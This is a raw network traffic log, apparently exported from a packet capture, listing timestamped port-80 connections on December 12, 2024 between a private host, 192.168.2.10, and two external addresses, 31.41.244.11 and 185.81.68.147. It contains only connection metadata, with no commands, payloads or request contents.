Dec 12, 2024 16:48:38.636092901 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.636149883 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.637001038 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.637008905 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.637059927 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.638005972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.638070107 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.638725996 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.638798952 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.639122009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.639131069 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.639173985 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.640162945 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.640265942 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.641297102 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.641304016 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.641350985 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.641376019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.641446114 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.642333031 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.642462969 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.643403053 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.643412113 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.643418074 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.643456936 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.644458055 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.644501925 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.644563913 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.644608021 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.645524025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.645628929 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.645701885 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.645740032 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.646639109 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.646692038 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.647227049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.647316933 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.647731066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.647743940 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.647782087 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.648700953 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.648812056 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.650075912 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.650084019 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.650096893 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.650141954 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.650171995 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.650871038 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.650918007 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.651007891 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.651227951 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.651972055 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.652580976 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.652991056 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.652997971 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.653034925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.653043985 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.653074026 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.654068947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.654438019 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.654511929 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.654589891 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.655136108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.655260086 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.791821003 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.791893005 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.791914940 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.791992903 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.792285919 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.792335033 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.792437077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.792578936 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.793450117 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.793515921 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.793782949 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.794241905 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.794460058 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.794518948 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.795222044 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.795295954 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.795561075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.795573950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.795628071 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.796566963 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.796632051 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.797132015 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.797219992 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.797663927 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.797712088 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.798198938 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.798249006 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.798722982 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.798772097 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.799034119 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.799592018 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.799943924 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.799979925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.800015926 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.800035954 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.800869942 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.800930023 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.800988913 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.801472902 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.802045107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.802102089 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.802467108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.802824020 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.803069115 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.803193092 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.803237915 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.804075956 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.804121017 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.804160118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.804197073 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.805252075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.805268049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.805309057 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.805325031 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.806258917 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.806333065 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.806375027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.806487083 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.807297945 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.807362080 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.807992935 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.808032036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.808434010 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.808449030 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.808481932 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.808500051 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.809533119 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.809593916 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.809673071 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.809782028 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.810545921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.810601950 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.811077118 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.811117887 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.811577082 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.811635017 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.811902046 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.812654972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.812711954 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.812946081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.813759089 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.813811064 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.813890934 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.814882040 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.814958096 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.815074921 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.815661907 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.815866947 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.815973997 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.816057920 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.816307068 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.816935062 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.816977978 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.817523956 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.817589045 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.817981958 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.818027020 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.818137884 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.818197012 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.819067001 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.819116116 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.819154978 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.819200039 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.820183992 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.820225954 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.820255995 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.820278883 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.821194887 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.821269035 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.821866035 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.821919918 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.822319031 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.822372913 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.822407007 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.822449923 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.823333025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.823389053 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.823710918 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.823761940 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.824438095 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.824537039 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.824646950 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.824695110 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.825608015 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.825618982 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.825655937 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.825673103 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.826756954 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.826801062 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.827012062 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.827056885 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.827614069 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.827706099 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.827817917 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.827860117 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.828844070 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.828915119 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.829837084 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.829873085 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.829935074 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.829946041 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.829988003 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.831098080 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.831156969 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.831348896 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.831521988 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.832015991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.832073927 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.832227945 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.832339048 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.832983971 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.833035946 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.833185911 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.833297968 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.834100962 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.834111929 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.834153891 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.835103989 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.835258961 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.835745096 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.835800886 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.836205006 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.836261034 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.836321115 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.836360931 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.837241888 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.837289095 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.837352037 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.837388039 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.838313103 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.838376999 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.838684082 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.838735104 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.839483023 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.839505911 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.839546919 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.839567900 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.840445042 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.840487957 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.841391087 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.841455936 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.841592073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.841603994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.841648102 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.842586040 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.842633963 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.843698025 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.843709946 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.843733072 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.843736887 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.843765020 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.843782902 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.844753027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.844803095 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.844938993 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.844985008 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.845905066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.846028090 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.846915960 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.846929073 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.846939087 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.846961975 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.846991062 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.848048925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.848120928 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.966101885 CET	80	49938	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:38.966567993 CET	80	49938	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:38.966635942 CET	49938	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:38.967524052 CET	49938	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:38.967860937 CET	49943	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:38.984086037 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.984127045 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.984150887 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.984174013 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.984541893 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.984602928 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.984673977 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.984724045 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.985402107 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.985482931 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.985493898 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.985564947 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.986502886 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.986551046 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.986587048 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.986607075 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.987586975 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.987637043 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.987873077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.987921000 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.988589048 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.988634109 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.988665104 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.988712072 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.989734888 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.989792109 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.989943027 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.990060091 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.990770102 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.990822077 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.990884066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.990926981 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.991794109 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.991867065 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.991941929 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.992003918 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.992887020 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.992933989 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.993175983 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.993244886 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.993949890 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.994020939 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.994255066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.994303942 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.995024920 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.995070934 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.995188951 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.995234013 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.996082067 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.996185064 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.996599913 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.996640921 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.997163057 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.997208118 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.997296095 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.997345924 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.998245001 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.998290062 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.998294115 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.998330116 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.999370098 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.999413967 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:38.999741077 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:38.999788046 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:39.000519991 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:39.000571012 CET	49931	80	192.168.2.10	31.41.244.11
